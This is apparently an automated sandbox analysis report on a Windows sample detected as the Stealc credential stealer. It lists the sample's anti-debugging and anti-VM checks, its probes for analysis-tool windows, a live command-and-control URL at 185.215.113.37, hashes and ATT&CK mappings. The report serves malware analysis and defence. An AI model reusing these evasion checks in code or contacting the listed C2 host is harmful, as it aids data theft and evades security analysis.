                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630821 second address: 630828 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630828 second address: 630831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630831 second address: 630835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635F4C second address: 635F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6361A8 second address: 6361AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 636547 second address: 63657C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F8480C71BFFh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push dword ptr [ebp+122D2D54h] 0x00000012 cmc 0x00000013 push 9E1CC61Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a jnp 00007F8480C71C01h 0x00000020 jmp 00007F8480C71BFBh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637A9A second address: 637AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8480E31386h 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0361 second address: 4CA03B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8480C71BFFh 0x00000009 xor esi, 5F0EB5DEh 0x0000000f jmp 00007F8480C71C09h 0x00000014 popfd 0x00000015 jmp 00007F8480C71C00h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 mov edi, eax 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA03B0 second address: 4CA03ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ax, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F8480E31396h 0x00000015 or cx, 3F68h 0x0000001a jmp 00007F8480E3138Bh 0x0000001f popfd 0x00000020 mov ecx, 6C17715Fh 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA03ED second address: 4CA03F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA03F3 second address: 4CA0415 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8480E31396h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0415 second address: 4CA043C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8480C71C05h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA04B9 second address: 4CA04D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480E31394h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA04D1 second address: 4CA04D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559A3C second address: 559A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559DEB second address: 559DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8480C71BF6h 0x0000000a popad 0x0000000b rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3A1C06 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 54DBAF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5726EB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5D9682 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001538B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00154910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00154910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0014DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0014E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0014ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00154570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00154570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0014DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0014BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014F68A FindFirstFileA,0_2_0014F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0014F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00153EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00153EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001416D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00141160 GetSystemInfo,ExitProcess,0_2_00141160
                Source: file.exe, file.exe, 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2171497374.0000000000E34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWy
                Source: file.exe, 00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2171497374.0000000000E34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2171497374.0000000000E01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`q
                Source: file.exe, 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13744
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13741
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13759
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13755
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13795
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001445C0 VirtualProtect ?,00000004,00000100,000000000_2_001445C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00159860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00159860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00159750 mov eax, dword ptr fs:[00000030h]0_2_00159750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00157850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00157850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2796, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00159600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00159600
                Source: file.exe, file.exe, 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: E1Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00157B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00156920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00156920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00157850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00157850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00157A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00157A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.140000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2125087117.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2796, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.140000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2125087117.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2796, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpnfile.exe, 00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpbfile.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37file.exe, 00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/rfile.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpVfile.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/Gfile.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.phpm:file.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.37
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1540851
                            Start date and time:2024-10-24 09:06:07 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 13s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 89
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Excluded IPs from analysis (whitelisted): 20.12.23.50
                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.37g4Cyr2T5jq.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousLummaC, StealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLg4Cyr2T5jq.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                            • 185.215.113.16
                            msqT9atzYW.exeGet hashmaliciousAmadeyBrowse
                            • 185.215.113.43
                            file.exeGet hashmaliciousLummaC, StealcBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.16

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.947723498064361
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'854'464 bytes
                            MD5:c4d992e32dabd4723370d920a842d759
                            SHA1:e2ba688cb7d4a7c88c964ec875e62529d63057c7
                            SHA256:fc379207ec04489ab7610663a20efa6827c0ff39c842335048fccc15f202c447
                            SHA512:ec911f4ae4534824e15a584ccd1c181270640e2b8367a6f59bf0f49fce158de0a1e4eb60abb10edcd7a3bd0e7e86c84d44af5d90f925d4ad7c77448658b5d5f9
                            SSDEEP:49152:QaWIelCd4Q3JYPh9rF4w5vt8J/UmG3WQh7X4:QaWIec3CHiwZqJ/IWqL
                            TLSH:46853390DE54AAA7D00E6DF258EFBE0116791859C3F1CFA0F90C53F9999AF6C61036C2
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0xaa3000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007F8480B2660Ah
                            cvtpi2ps xmm3, qword ptr [eax+eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            jmp 00007F8480B28605h
                            add byte ptr [edx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [0000000Ah], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, byte ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add eax, 0000000Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax*4], cl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, byte ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, byte ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            push es
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
